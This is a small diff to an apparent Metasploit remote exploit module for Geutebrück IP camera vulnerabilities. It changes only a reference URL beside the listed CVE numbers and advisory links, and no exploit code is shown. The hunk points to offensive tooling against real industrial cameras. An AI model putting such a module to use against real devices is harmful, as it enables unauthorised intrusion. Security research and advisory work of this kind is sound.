@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2021-33552'],
           ['CVE', '2021-33553'],
           ['CVE', '2021-33554'],
-          [ 'URL', 'http://geutebruck.com' ],
+          [ 'URL', 'https://www.geutebrueck.com/index.html' ],
           [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
           [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
         ],
